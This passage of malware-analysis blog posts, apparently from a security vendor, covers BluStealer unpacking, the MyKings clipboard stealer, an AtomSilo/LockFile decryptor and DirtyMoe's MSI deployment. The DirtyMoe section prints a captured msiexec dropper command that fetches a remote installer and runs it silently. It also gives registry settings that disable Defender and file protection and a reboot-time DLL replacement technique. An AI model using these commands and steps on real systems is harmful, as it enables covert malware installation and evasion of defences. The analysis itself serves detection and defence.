  • C:\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\note\notepad.exe

In the samples we looked at closely, the module is decrypted using RC4, with a hardcoded key. The key is obfuscated by a string provider function. The best way to obtain the payload is to break at the tail jump that resides within the same namespace where the encrypted module is referenced. In most cases, it usually is the call to the external function Data(). Below are examples from the different samples:

Second stage

Inside the Data() function of the second stage which has two strange resource files along with their getter functions

The second stage has the function calls and strings obfuscated, so the “Analyze” feature may not be as helpful. However, there are two resource files that look out-of-place enough for us to pivot off. Their getter functions can be easily found in the Resources class of the Properties namespace. Setting the breakpoint on the Ehiuuvbfrnprkuyuxqv getter function 0x17000003 leads us to a function where it is gzip decompressed revealing a PE file.

Ehiuuvbfrnprkuyuxqv is decompressed with gzip

On the other hand, the breakpoint on the Ltvddtjmqumxcwmqlzcos getter function 0x17000004 leaves us in the middle of the Data() function, where all the function calls are made by passing a field into CompareComparator function that will invoke it like a method.

ComareComparator is used to invoke one of the argument

In order to understand what is going on, we have to know what functions these fields represent. From the experience working with MassLogger in the past, the field to method map file is likely embedded in the resource section, which in this case, “Dic.Attr” naming is a strong tell.

Note that it is important to find out where these fields are mapped to, because “Step into” may not get us directly to the designated functions. Some of the mapped functions are modified during the field-method binding process. So when the corresponding fields are invoked, the DynamicResolver.GetCodeInfo() will be called to build the target function at run-time. Even though the function modification only consists of replacing some opcodes with equivalent ones while keeping the content the same, it is sufficient enough to obfuscate function calls during dynamic analysis.

Dic.Attr is interpreted into a field-method dictionary

The search of the “Dic.Attr” string leads us to the function where the mapping occurs. The dictionary value represents the method token that will be bound, and the key value is the corresponding field. As for the method tokens start with 0x4A, just replace them with 0x6 to get the correct methods. These are the chosen ones to be modified for obfuscation purposes.

With all the function calls revealed, we can understand what’s going on inside the Data() method. First, it loads a new assembly that is the decompressed Ehiuuvbfrnprkuyuxqv. Then, it tries to create an instance of an object named SmartAssembly.Queues.MapFactoryQueue. To end the mystery, a method called “RegisterSerializer” is invoked with the data of the other resource file as an argument. At this point, we can assume that the purpose of this function would be to decrypt the other resource file and execute it.

Heading to the newly loaded module (af43ec8096757291c50b8278631829c8aca13649d15f5c7d36b69274a76efdac), we can see the SmartAssembly watermark and all the obfuscation features labeled as shown below.

Overview of the decompressed Ehiuuvbfrnprkuyuxqv. Here you can find the method RegisterSerializer locates inside SmartAssembly.Queues.MapFactoryQueue

The unpacking process will not be much different from the previous layer but with the overhead of code virtualization. From static analysis, our RegisterSerializer may look empty but once the SmartAssembly.Queues class is instantiated the method will be loaded properly:

The function content when analyzed statically.
The function content after instantiated. Note that argument “res” represents the data of the second resource file
Fast forward to where res is processed inside RegisterSerializer()

Lucky for us, the code looks fairly straightforward. The variable “res” holding the encrypted data and is passed to a function that RulesListener.IncludeState represents. Once again, the key still is to find the field token to method token map file which is likely to be located in the resource section. This time searching for the GetManifestResourceStream function will help us quickly get to the code section where the map is established:

The resource file Params.Rules is interpreted into a field-method dictionary

RulesListener.IncludeState has token 0x04000220 which is mapped to function 0x60000A3. Inside this function, the decryption algorithm is revealed anticlimactically: reversal and decompression:

Data from Ltvddtjmqumxcwmqlzcos is reversed
Then it is decompressed and executed

In fact, all the samples can be unpacked simply by decompressing the reversed resource file embedded in the second stage. Hopefully, even when this algorithm is changed, my lengthy walkthrough will remain useful at showing you how to defeat the obfuscation tricks.


In this article, we break down BluStealer functionalities and provide some utilities to deobfuscate and extract its IOCs. We also highlight its code reuse of multiple open-source projects. Despite still writing data to disk and without a proper C2 functionality, BluStealer is still a capable stealer. In the second half of the blog, we show how the BluStealer samples and other malware can be obtained from a unique .NET loader. With these insights, we hope that other analysts will have an easier time classifying and analyzing BluStealer.


The full list of IoCs is available at




Crypto Address List

1ARtkKzd18Z4QhvHVijrVFTgerYEoopjLP (1.67227860 BTC)
1AfFoww2ajt5g1YyrrfNYQfKJAjnRwVUsX (0.06755943 BTC)


0xd070c48cd3bdeb8a6ca90310249aae90a7f26303 (0.10 ETH)


Litecoint address:

Telegram Tokens:



[email protected] (
[email protected] ( )
[email protected] (
[email protected] (
[email protected]
[email protected] (
[email protected] (
[email protected] (

.NET Loader SHA-256:


The post BluStealer: from SpyEx to ThunderFox appeared first on Avast Threat Labs.

The King is Dead, Long Live MyKings! (Part 1 of 2)

12 October 2021 at 11:35

MyKings is a long-standing and relentless botnet which has been active from at least 2016. Since then it has spread and extended its infrastructure so much that it has even gained multiple names from multiple analysts around the world — MyKings, Smominru, and DarkCloud, for example. Its vast infrastructure consists of multiple parts and modules, including bootkit, coin miners, droppers, clipboard stealers, and more.

Our research has shown that, since 2019, the operators behind MyKings have amassed at least $24 million USD (and likely more) in the Bitcoin, Ethereum, and Dogecoin cryptowallets associated with MyKings. While we can’t attribute that amount solely to MyKings, it still represents a significant sum that can be tied to MyKings activity.

Our hunting for new samples brought us over 6,700 unique samples. Just since the beginning of 2020 (after the release of the Sophos whitepaper), we protected over 144,000 Avast users threatened by this clipboard stealer module. Most attacks happened in Russia, India, and Pakistan.

Map illustrating targeted countries since 1.1.2020 until 5.10.2021

In this first part of our two-part blog series, we will peek into the already known clipboard stealer module of MyKings, focusing on its technical aspects, monetization, and spread. In addition, we’ll look into how the functionality of  the clipboard stealer enabled attackers to carry out frauds with Steam trade offers and Yandex Disk links, leading to more financial gain and infection spread. 

Avast has been tracking the MyKings’ clipboard stealer since the beginning of 2018, but we can’t rule out an even earlier creation date. Basic functionality of this module was already covered by Gabor Szappanos from SophosLabs, but we are able to contribute with new technical details and IoCs.

1. Monetary gain

When Sophos released their blog at the end of 2019, they stated that the coin addresses are “not used or never received more than a few dollars”. After tracing newer samples, we were able to extract new wallet addresses and extend the list of 49 coin addresses in Sophos IoCs to over 1300.

Because of the amount of new data, we decided to share our script, which can query the amount of cryptocurrency transferred through a crypto account. Because not all blockchains have this possibility, we decided to find out how much money attackers gained through Bitcoin, Ethereum, and Dogecoin accounts. After inspecting these addresses we have confirmed that more than $24,700,000 worth in cryptocurrencies was transferred through these addresses. We can safely assume that this number is in reality higher, because the amount consists of money gained in only three cryptocurrencies from more than 20 in total used in malware. It is also important to note here that not all of the money present in the cryptowallets necessarily comes from the MyKings campaign alone.

After taking a closer look at the transactions and inspecting the contents of installers that dropped the clipboard stealer, we believe that part of this money was gained through crypto miners. The clipboard stealer module and the crypto miners were seen using the same wallet addresses.

Cryptocurrency Earnings in USD Earnings in cryptocurrency
Bitcoin 6,626,146.252 [$] 132.212 [BTC]
Ethereum 7,429,429.508 [$] 2,158.402 [ETH]
Dogecoin 10,652,144.070 [$] 44,618,283.601 [DOGE]
Table with monetary gain (data refreshed 5.10.2021)
Histogram of monetary gains for Bitcoin, Ethereum and Dogecoin wallets

2. Attribution

Even though the clipboard stealer and all related files are attributed in previous blog posts to MyKings, we wanted to confirm those claims, because of lack of definitive proof. Some articles (e.g. by Sophos) are saying that some scripts in the attribution chain, like c3.bat may kill other botnets or earlier versions of itself, which raises doubts. Other articles (e.g by Guardicore) are even working with the theory of a rival copycat botnet deleting MyKings.  MyKings is a large botnet with many modules and before attributing all the monetary gains to this clipboard stealer, we wanted to be able to prove that the clipboard stealer is really a part of MyKings.

We started our attribution with the sample d2e8b77fe0ddb96c4d52a34f9498dc7dd885c7b11b8745b78f3f6beaeec8e191. This sample is a NSIS installer which drops NsCpuCNMiner in both 32 and 64 bit versions.

In the NSIS header was possible to see this Monero address used for miner configuration:

NSIS header

Apart from the NsCpuCNMiner, the sample dropped an additional file with a name java12.exe into C:\Users\<username>\AppData\Local\Temp\java.exe. This file has SHA256 0390b466a8af2405dc269fd58fe2e3f34c3219464dcf3d06c64d01e07821cd7a and according to our data, was downloaded from http://zcop[.]ru/java12.dat by the installer. This file could be also downloaded from http://kriso[.]ru/java12.dat (both addresses contained multiple samples with different configurations at different times). This file contains a clipboard stealer. Also, the same Monero address can be found in both the clipboard stealer and the NSIS configuration.

After researching the Monero address, we found in blogpost written by Tencent Yujian Threat Intelligence Center, that sample b9c7cb2ebf3c5ffba6fdeea0379ced4af04a7c9a0760f76c5f075ded295c5ce2 uses the same address. This sample is another NSIS installer which drops the NsCpuCNMiner and the clipboard stealer. This NSIS installer was usually dropped under the name king.exe or king.dat and could be downloaded from http://kr1s[.]ru/king.dat.

In the next step, we looked into the address http://kr1s[.]ru/king.dat and we found that at different times, this address contained the file f778ca041cd10a67c9110fb20c5b85749d01af82533cc0429a7eb9badc45345c usually dropped into C:\Users\<username>\AppData\Local\Temp\king.exe or C:\Windows\system32\a.exe. This file is again a NSIS installer that downloads clipboard stealer, but this time it contains URLs http://js[.] and http://js[.]

URL http://js[.] is interesting, because this URL is also contacted by the sample named my1.html or  my1.bat or my1.bat with SHA256 5ae5ff335c88a96527426b9d00767052a3cba3c3493a1fa37286d4719851c45c.

This file is a batch script which is almost identical to the script with the same name my1.bat and SHA256 2aaf1abeaeeed79e53cb438c3bf6795c7c79e256e1f35e2a903c6e92cee05010, as shown further below.

Both scripts contain the same strings as C:\Progra~1\shengda, C:\Progra~1\kugou2010

There are only two important differences to notice:

  1. At line 12, one script uses address http://js[.] and the other uses address http://js[.]
  2. Line 25 in the second script has commands that the first script doesn’t have. You can notice strings like fuckyoumm3, a very well known indicator of MyKings.
Comparison of the batch scripts – script   5ae5ff335c88a96527426b9d00767052a3cba3c3493a1fa37286d4719851c45c contacting the C&C related to the clipboard stealer
Comparison of the batch scripts – script 2aaf1abeaeeed79e53cb438c3bf6795c7c79e256e1f35e2a903c6e92cee05010 contacting the C&C related to MyKings

Furthermore, it is possible to look at the file c3.bat with SHA256 0cdef01e74acd5bbfb496f4fad5357266dabb2c457bc3dc267ffad6457847ad4. This file is another batch script which communicates with the address http://js[.] and contains many MyKings specific strings like fuckayoumm3 or task name Mysa1.

Attribution chain

3. Technical analysis

Our technical analysis of the clipboard stealer focuses primarily on new findings.

3.1 Goal of the malware

The main purpose of the clipboard stealer is rather simple: checking the clipboard for specific content and manipulating it in case it matches predefined regular expressions. This malware counts on the fact that users do not expect to paste values different from the one that they copied. It is easy to notice when someone forgets to copy and paste something completely different (e.g. a text instead of an account number), but it takes special attention to notice the change of a long string of random numbers and letters to a very similar looking string, such as cryptowallet addresses. This process of swapping is done using  functions OpenClipboard, EmptyClipboard, SetClipboardData and CloseClipboard. Even though this functionality is quite simple, it is concerning that attackers could have gained over $24,700,000 using such a simple method.

Simple routine of the clipboard content swap

As can be seen on image below, most of the regular expressions used for checking the clipboard content will match wallet formats of one specific cryptocurrency, but there are also regular expressions to match Yandex file storage, links to the Russian social network VKontakte, or Steam trade offer links.

List of regular expressions matching specific cryptocurrencies and URLs

We were able to find many comments from people at BlockChain Explorer services believing that they sent money to the incriminated accounts by a mistake and asking or demanding that their money be sent back. In response to this malicious activity, we want to increase awareness about frauds like this and we highly recommend people always double-check transaction details before sending  money.

Comments from infected users connected to address 0x039fD537A61E4a7f28e43740fe29AC84443366F6

3.2 Defense & features

Some other blog posts describe a few anti-debugging checks and defense against system monitoring tools, but we can’t confirm any new development.

In order to avoid multiple executions, the clipboard stealer checks for mutex on execution. The mutex name is created dynamically by checking on which version of OS it is launched on. This procedure is performed using functions RegOpenKeyExA which opens the registry key SOFTWARE\Microsoft\Windows NT\CurrentVersion. Afterwards, a function RegQueryValueExA is called which gets the value of ProductName. The value obtained is then concatenated with the constant suffix 02. Using this method, you can get many more possibilities of existing mutexes. In the list below, you can find a few examples of mutex names:

  • Windows 7 Professional02
  • Windows 7 Ultimate02
  • Windows 10 Enterprise02
  • Windows 10 Pro02
  • Windows XP02

In a different version of the malware, an alternative value is used from registry key SOFTWARE\Microsoft\Windows NT\CurrentVersion  and value of BuildGUID. This value is then also appended with suffix 02 to create the final mutex name.

Another mechanism serving as a defense of this malware is trying to hide the addresses of cryptowallets belonging to attackers. When the malware matches any of the regular expressions in the clipboard, it substitutes the clipboard content with a value that is hardcoded inside the malware sample. For protection against quick analysis and against static extraction with regular expressions, the substitute values are encrypted. Encryption used is a very simple ROT cipher, where the key is set to -1.

For a quick and static extraction of wallets from samples, it’s possible to decrypt the whole sample (which destroys all data except wanted values) and then use regular expressions to extract the hidden substitute values. The advantage of this approach is that the malware authors already provided us with all necessary regular expressions; thus the extraction process of the static information can be easily automated.

3.3 Newly uncovered functionality

With a larger dataset of samples, we were also able to reveal the intentions of regular expressions checking for URLs.

3.3.1 Steam trade frauds

One of the regular expressions hardcoded in samples looks like this:

This kind of expression is supposed to match Steam trade offer links. Users on the Steam platform can create trade offers to trade what are usually in-game items from their inventory with other users. The value of the items that can be traded starts at only a few cents, but the most expensive items are being sold for hundreds or thousands dollars.

The clipboard stealer manipulates the trade offer URL and changes the receiving side, so Steam users send their items to someone completely unknown. The exchanged link then looks like this one:

In total we were able to extract 14 different Steam trade offer links that appeared in almost 200 samples. These links lead us to 14 Steam accounts — some of which were banned and some had set privacy restrictions — but among the working public accounts we were able to find information that assured us that these frauds happened. An example is this is an account which was bound to the trade offer link listed above:

After checking the comments section of this account, we could see multiple people getting angry and curious as to why their trade offer links are getting changed. Even though some people noticed the change in the trade offer link, we suppose that some trades were completed. We were not able to estimate how much money could have been stolen through this technique.

Comments  from

Translation of comments:

  1. 9 Oct, 2020 @ 7:47 pm why is my trade link changing to yours?
  2. 21 Jul, 2020 @ 2:16 pm Th for the garbage with a trade link !!! ???
  3. 27 Jun, 2020 @ 5:05 am what a fagot what did you do with the link

3.3.2 Fake Yandex Disk links 

Another functionality is related to the regular expression:

This regular expression matches links to Yandex Disk storage. Yandex Disk is a cloud service created by multinational Russian company Yandex and can be used similarly as Google Drive or Dropbox for sharing files.

The objective of this technique is to match links that users are sending to their friends and family to share files or photos. If the malware runs on the sender’s machine, the infected victim is sending wrong links to all their acquaintances. If the malware runs on the machine of the user that receives the link and copy/pastes it to the browser address bar, the victim again opens a wrong link. In both cases, the wrong link gets opened by someone unaware that the content is wrong. In both cases, the victim downloads files from that link and opens them, because there is no reason to not trust the files received from someone they know.

From the set of analyzed samples, we extracted following 4 links to Yandex Disk storage:

  1. https://yadi[.]sk/d/cQrSKI0591KwOg
  2. https://yadi[.]sk/d/NGyR4jFCNjycVA
  3. https://yadi[.]sk/d/zCbAMw973ZQ5t3
  4. https://yadi[.]sk/d/ZY1Qw7RRCfLMoQ

All of the links contain packed archives in a .rar or .zip format, protected with a password. The password is usually written in the name of the file. As you can see on the image below, the file is named, for example, as “photos,” with the password 5555.

Contents on https://disk[.]

4. Conclusion

In this first part of the blog series, we focused on the MyKings clipboard stealer module, going through the attribution chain and uncovering the amounts of money that attackers were able to obtain along the way. The clipboard stealer also focuses on frauds regarding Steam trade offers and Yandex Disk file sharing, distributing further malware to unaware victims.

In the next part of this blog series, we will go down the rabbit hole — exploring the contents of one of the downloaded payloads and providing you with an analysis of the malware inside. Don’t miss it!

Indicators of Compromise (IoC)

SHA256 hashes

Also in our GitHub.

Windows 7 Professional02
Windows 7 Ultimate02
Windows 10 Enterprise02
Windows 10 Pro02
Windows XP02

Also in our GitHub.

C&C and logging servers

Complete list in our GitHub.


Yandex disk links

Complete list in our GitHub.

Steam trade offer links

Complete list in our GitHub.

Wallet addresses

Complete list in our GitHub.


Script for querying amounts transferred through wallet addresses can be found in our GitHub.

The post The King is Dead, Long Live MyKings! (Part 1 of 2) appeared first on Avast Threat Labs.

Avast releases decryptor for AtomSilo and LockFile ransomware

27 October 2021 at 15:59

On Oct 17, 2021, Jiří Vinopal published information about a weakness in the AtomSilo ransomware and that it is possible to decrypt files without paying the ransom. Slightly later, he also analyzed another ransomware strain, LockFile. We prepared our very own free Avast decryptor for both the AtomSilo and LockFile strains.

Limitation of the decryptor

During the decryption process, the Avast AtomSilo decryptor relies on a known file format in order to verify that the file was successfully decrypted. For that reason, some files may not be decrypted. This can  include files with proprietary or unknown format, or with no format at all, such as text files.

How AtomSilo and LockFile Work

Both the AtomSilo and LockFile ransomware strains are very similar to each other and except for minor differences, this description covers both of them. 

AtomSilo ransomware searches local drives using a fixed drive list, whilst LockFile calls GetLogicalDriveStringsA() and processes all drives that are fixed drives.

A separate thread is created for each drive in the list. This thread recursively searches the given logical drive and encrypts files found on it. To prevent paralyzing the compromised PC entirely, AtomSilo has a list of folders, file names and file types that are left unencrypted which are listed here:

Excluded folders
Boot Windows Windows.old Tor Browser
Internet Explorer Google Opera Opera Software
Mozilla Mozilla Firefox $Recycle.Bin ProgramData
All Users
Excluded files
autorun.inf index.html  boot.ini bootfont.bin
bootsect.bak bootmgr bootmgr.efi bootmgfw.efi
desktop.ini iconcache.db ntldr ntuser.dat
ntuser.dat.log ntuser.ini thumbs.db #recycle
Excluded extensions
.hta .html .exe .dll .cpl .ini
.cab .cur .cpl .drv .hlp .icl
.icns .ico .idx .sys .spl .ocx

LockFile avoids files and folders, containing those sub-strings:

Excluded sub-strings
Windows NTUSER LOCKFILE .lockfile

In addition to that, there is a list of 788 file types (extensions), which won’t be encrypted. Those include .exe, but also .jpg, .bmp and .gif. You may noticed that some of them are included repeatedly.

The ransomware generates RSA-4096 session keypair for each victim. Its private part is then stored in the ransom note file, encrypted by the master RSA key (hardcoded in the binary). A new AES-256 file key is generated for each file. This key is then encrypted by the session RSA key and stored at the end of the encrypted file, together with original file size. 

Each encrypted file contains a ransom note file with one of the names:

  • README-FILE-%ComputerName%-%TimeStamp%.hta
  • LOCKFILE-FILE-%ComputerName%-%TimeStamp%.hta

Encrypted files can be recognized by the .ATOMSILO or .lockfile extension: 

When the encryption process is complete, the ransom note is shown to the user. Each strain’s ransom note has its own look:

AtomSilo Ransom Message
LockFile Ransom Message

How to use the Decryptor

To decrypt your files, please, follow these steps:

  1. Download the free decryptor. The single EXE file covers both ransomware strains.
  2. Simply run the EXE. It starts in form of wizard, which leads you through configuration of the decryption process.
  3. On the initial page, you can see a list of credits. Simply click “Next”
  1. On the next page, select the list of locations which you want to be decrypted. By default, it contains a list of all local drives.
  1. On the third page, you can select whether you want to backup encrypted files. These backups may help if anything goes wrong during the decryption process. This option is turned on by default, which we recommend. After clicking “Decrypt”, the decryption process begins.
  1. Let the decryptor work and wait until it finishes.


We would like to thank Jiří Vinopal for sharing analysis of both ransomware strains.


SHA filename
d9f7bb98ad01c4775ec71ec66f5546de131735e6dba8122474cc6eb62320e47b .ATOMSILO
bf315c9c064b887ee3276e1342d43637d8c0e067260946db45942f39b970d7ce .lockfile

The post Avast releases decryptor for AtomSilo and LockFile ransomware appeared first on Avast Threat Labs.

DirtyMoe: Deployment

3 November 2021 at 14:54


In the first article, we have described a complex malware, called DirtyMoe, from a high-level point of view. Most of the captured samples were MSI Installer packages which were delivered onto a victim’s machine by the PurpleFox exploit kit. So in the fourth part of the DirtyMoe series, we will focus on DirtyMoe’s deployment and how DirtyMoe tackles various issues with different versions of Windows.

To understand what the MSI package executes on the victim’s machine, we have analyzed the MSI package in terms of registry and file manipulations, installer’s arguments, and post-reboot operations. We have also tried to put these actions into the context to determine the purpose of its individual actions in DirtyMoe’s deployment.

The DirtyMoe’s MSI installer abuses the Windows System Event Notification Service (SENS) to deploy DirtyMoe. The main goal of the MSI installer is to replace the system DLL file of SENS with a malicious payload and execute the payload as a legitimate service. Another essential point is configuring the anti-detection methods to keep DirtyMoe under the radar.

The DirtyMoe malware requires different locations of installed files and registry entries for each Windows version that the malware targets. Since the MSI Installer provides a convenient way to install arbitrary software across versions of Windows, its usage seems like a logical choice.

1. Scope

We have recorded two versions of MSI installer packages distributing DirtyMoe. Both versions perform very similar actions for the successful DirtyMoe deployment. The main difference is the delivery of malicious files via a CAB file. The older version of the MSI package includes the CAB file directly in the package, while the newer version requires the CAB file in the same location as the package itself.

The effect of the separate CAB file easily allows managing payloads that need to be deployed. Further, it reduces the size of the primary exploit payload because the CAB file can be downloaded after successful exploitations.

1.1 All in One Package (older version)

The example of the all in one package is a sample with SHA-256:

The package details follow:

  • Product Version:
  • Product Code: {80395032-1630-4C4B-A997-0A7CCB72C75B}
  • Install Condition:
    • is Windows NT (cannot be installed on Windows 9x/ME)
    • is not Windows XP SP2 x64 or Windows Server 2003 SP2 x64
    • is not Windows XP/2003 RTM, Windows XP/2003 SP1, Windows XP SP2 x86
    • is not Windows NT 4.0
    • is not Windows 2000
    • not exist SOFTWARE\SoundResearch\UpdaterLastTimeChecked3 with value 3
  • File Size: 2.36 MB
1.2 Excluded Data Package (newer version)

The newer version of the MSI package consists of two parts. The first part is the MSI package itself and the separate CAB file containing the malicious payloads. The MSI package refers to one of the following CAB files:,,, ,,, , . The CAB file contains three malicious files, but only one file (sysupdate.log) is different for each CAB file. Detailed information about the file manipulation is described in Section 3.

The example of the newer MSI package is a sample with SHA-256:

The package details follow:

  • Product Version:
  • Product Code: {80395032-1630-4C4B-A997-0A7CCB72C75B}
  • Install Condition:
    • is Windows NT (cannot be installed on Windows 9x/ME)
    • is not Windows XP SP2 x64 or Windows Server 2003 SP2 x64
    • is not Windows XP/2003 RTM, Windows XP/2003 SP1, Windows XP SP2 x86
    • is not Windows NT 4.0
    • is not Windows 2000
    • not exist HKLM\SOFTWARE\Microsoft\DirectPlay8\Direct3D
    • not exist HKCU\SOFTWARE\7-Zip\StayOnTop
  • File Size: 1.020 MB

Note: The product name is usually different for each .msi file. It is a random string composed of capital letters of length 36. The product code has so far been observed with the same value.

2. Registry Manipulation

The malware authors prepare a victim environment to a proper state via the MSI installer. They focus on disabling anti-spyware and file protection features. Additionally, the MSI package uses one system configuration to bypass Windows File Protection (WFP) to overwrite protected files despite the fact that WFP should prevent replacing critical Windows system files [1].

There are several registry manipulations during MSI installation, though we will describe only the most crucial registry entries.

2.1 Mutex

One of the malware registry entries is UpdaterLastTimeChecked[x], where x signifies how many times the MSI installer has been run. Each MSI installation of the package creates one entry. If UpdaterLastTimeChecked3 is present, the following package installation is not allowed. It is applicable only for the older version of the MSI package.

This registry manipulation is related only to the newer version. 7-Zip software does not support the stay on top feature. Therefore, it can be assumed that this registry entry serves as a flag that the installer package has been successfully run. SentinelLabs has published evidence that the presentence of this value indicates that a victim computer has been compromised by PurpleFox [2].

An active instance of the DirtyMoe malware stores settings and meta-data in this registry entry in an encrypted form. Therefore, if this entry is present in the system registry, the MSI installation is aborted.

2.2 Anti-Detection

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = 1
Microsoft Defender Antivirus can be disabled by the DisableAntiSpyware registry key set to 1. So, if the system has no 3rd party antivirus product, the system is without protection against malicious software, including spyware [3].

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable = 4
Windows File Protection (WFP) prevents non-system applications from replacing critical Windows system files that can cause problems with the operating system integrity and stability. WFP is typically enabled by default in all versions of Windows [4].

Naturally, DirtyMoe wants to avoid a situation where WFP detects any manipulation with the system files. Therefore, the SFCDisable value is set to four, enabling WFP, but every WFP action is not pop-upped by GUI. The effect is that WFP is enabled, so no system alerts are invoked, but WFP warning is hidden for users. This is applicable only for Windows XP.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCScan = 0
The System File Checker (SFC) provides the ability to scan system-protected files. SFC verifies file versions, and if it detects any file manipulation, SFC updates files to the correct version. This registry manipulation contributes to disabling SFC protecting the abused Windows service. This setup affects only file scanning, but WFP can still be active.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SvcHostSplitThresholdInKB = 0xFFFFFFFF
The crucial registry manipulation controls the system startup and some aspects of device configuration. To understand the primary purpose of the SvcHostSplitThresholdInKB registry entry, we must describe the historical development of Windows services and a generic host process.

In most cases, Windows services are run from dynamic-link libraries that Windows executes via the generic host process (svchost.exe). The hosted process can load more services (DLLs) as threads within one process. This is a historical relict from the times of Windows XP where system memory used to be a scarce commodity. The system used a few service host processes that hosted all Windows services, represented by DLL files, as the process creation and maintenance were expensive in terms of the system memory.

Figure 1 illustrates the example of run services and detailed information about the biggest host service process. Windows XP created 5 host processes grouped according to their purposes, such as LocalService, NetworkService, and System. PID 1016 is the biggest process in point of the memory usage view since this process hosts approx. 20 services. This approach saved the memory but made the system more unstable because if one of the services crashed, the entire service chain hosted by the same process was killed.

Figure 1. Service chain in Windows XP

Nowadays, there is no reason to group services within a few processes, and the resulting positive effects are increased system stability and security, as well as easier error analysis. Services now usually no longer share processes; mini-programs for providing system functions have an exclusive memory location. And if the svchost.exe process crashes, it no longer drags the entire service chain with it [5].

Windows 10 has come with a threshold value (SvcHostSplitThresholdInKB), determining when services shall be created as a regular process. The default value is 380,000, so the grouping service model is used if the system has less than 3.5 GB of memory. In other words, the increasing threshold value can reduce the amount of the host processes, and therefore it determines if the service processes are split.

Let’s give an example for Windows 10, if the value is set to 1, the number of host processes is approx. 70. And the threshold value equal to maximum (0xFFFFFFFF) causes that number of host processes to be only 26.

It is now understood that the maximum value of SvcHostSplitThresholdInKB can hide details about run processes. Therefore, the malware author set the threshold value to the maximum to hide the malicious service activity in threads. As a consequence, the malicious service is run within one host process in one of its threads. Accordingly, tracking and forensic analysis are made more difficult since the svchost process hosts many other services, and it is hard to assign system activities to the malware service.

2.3 Payload Delivery

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\SMBDeviceEnabled = 0
In order to prevent deployment of other malware via EternalBlue exploit [6], the MSI installer disables SMB sharing, effectively closing port 445 on Windows XP.

AllowProtectedRenames and PendingFileRenameOperations
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AllowProtectedRenames
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations

These registry entries are also related to WFP and therefore are crucial for the malicious code’s deployment to the victim machine. The principle is the same as in the MoveFileEx function with MOVEFILE_DELAY_UNTIL_REBOOT flag [7]. In other words, the MSI installer defines which file will be moved or deleted after reboot via the Session Manager Subsystem (SMSS) [8].

The malware authors abuse two system files, sens.dll for Windows Vista and newer, and cscdll.dll for Windows XP, see Section 3. Consequently, the SMSS replaces the critical system file with the malicious ones after the system reboot.

An example of the PendingFileRenameOperations value for Windows 7 32bit is as follows:





3. File Manipulation

DirtyMoe misuses the system services, precisely service DLL files, that are protected and which handlers are open, so replacing these files is not possible without the system reboot. Therefore, the first phase of the file manipulation is to extract payloads from the CAB file, and the second phase replaces the service DLL files with the extracted CAB files.

3.1 File Extraction

The CAB file usually contains three payload files.

  • winupdate32.log and winupdate64.log are malicious DLLs representing the DirtyMoe service.
  • sysupdate.log is an encrypted executable file that contains the default DirtyMoe module injected by the DirtyMoe service.

The MSI installer extracts and copies payloads from the CAB file into defined destinations if an appropriate condition is met, as the following table summarizes.

File Destination Condition
sysupdate.log %windir% None
winupdate32.log %windir% NOT VersionNT64
winupdate64.log %windir% VersionNT64

If the required files are extracted into the proper destination, the MSI installer ends and waits silently for the system to reboot. The next actions are performed by the SMSS.

3.2 File Replacement

The Session Manager Subsystem (SMSS) ensures replacing abused system files that are system-protected with the malicious ones based on PendingFileRenameOperations registry entry; see Section 2.3. In fact, the MSI installer invokes a post-reboot file manipulation based on a Windows version as follows:

Windows XP

  • Delete (if exist) %windir%\\AppPatch\\Acpcscdll.dll
  • Move %windir%\\system32\\cscdll.dll to %windir%\\AppPatch\\Acpcscdll.dll
  • Move %windir%\\winupdate32.log to %windir%\\system32\\cscdll.dll
  • Delete (if exist) %windir%\\AppPatch\\Ke583427.xsl
  • Move %windir%\\sysupdate.log to %windir%\\AppPatch\\Ke583427.xsl

Windows Vista and newer

  • Delete (if exist) %windir%\\AppPatch\\Acpsens.dll
  • Move %windir%\\system32\\sens.dll to %windir%\\AppPatch\\Acpsens.dll
  • Move %windir%\\winupdate64.log to %windir%\\system32\\sens.dll
  • Delete (if exist) %windir%\\AppPatch\\Ke583427.xsl
  • Move %windir%\\sysupdate.log to %windir%\\AppPatch\\Ke583427.xsl

The difference between Windows XP and Windows Vista and newer is an exploit of a hosting service. Windows XP uses Offline Network Agent (cscdll.dll) loaded by winlogon.exe under NT AUTHORITY\SYSTEM privileges. Windows Vista and newer provide System Event Notification Service (sens.dll) also run under SYSTEM. The Ke583427.xsl file is a default DirtyMoe module that is encrypted.

In short, the post-reboot operation slips DirtyMoe DLL into the system folder under the service name that is registered legitimately in the system. Replacement of such system files is possible because it is completed by SMSS, which is the first user-mode process started by the kernel. For that reason no handlers are created to the system DLL, and WFP is not also run yet. Finally, the malware represented by the slipped malicious DLL is started with system-level privileges since the abused service is registered as the legitimate service in Windows.

4. Deployment Workflow

If the PurpleFox successfully exploits a victim’s machine, the MSI installer package is run with administrator privileges. The MSI installer provides several options on how to install software silently, and therefore no user interaction is required. Although the system restart is necessary to apply all changes, the MSI installer also supports delayed restart; therefore, the user does not detect any suspicious symptoms. The installer only waits for the next system restart.

An example of how to run installation silently via MSI installer:
msiexec.exe /i <dirtymoe.msi> /qn /norestart; where /qn sets UI level to no UI.

We have captured a specific example of how the MSI installer is run after the successful system exploit.
Cmd /c for /d %i in ( do Msiexec /i http:\%i\ \Q

This dropper iterates five IP addresses that are different for each minute, including ports; see Section 2 of the first part of DirtyMoe series. The MSI installer is run for each IP address with parameter \Q, so if the requested remote location is not available or the MSI file does not exist, the installer does not inform the user about the error. The deployment process then runs silently in the background.

The MSI installer sets the system registry defined in Section 2 and copies malicious files to the Windows folder, see Section 3. The subsequent system restart will arrange the code execution of the malicious DLL containing ServiceMain, which Windows starts as the SENS service. Given the complexity of the malicious service, we will return to its detailed description in the following blog post.

